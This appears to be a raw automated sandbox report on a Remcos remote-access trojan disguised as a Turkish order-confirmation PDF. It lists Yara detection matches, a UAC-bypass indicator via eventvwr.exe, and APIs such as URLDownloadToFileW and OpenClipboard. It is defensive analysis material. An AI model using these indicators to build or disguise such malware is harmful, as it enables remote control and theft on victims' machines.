Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait 3_2_0040D2A6

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10554D8D SystemParametersInfoW, 3_2_10554D8D

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Uses 32bit PE files
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Yara signature match
Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
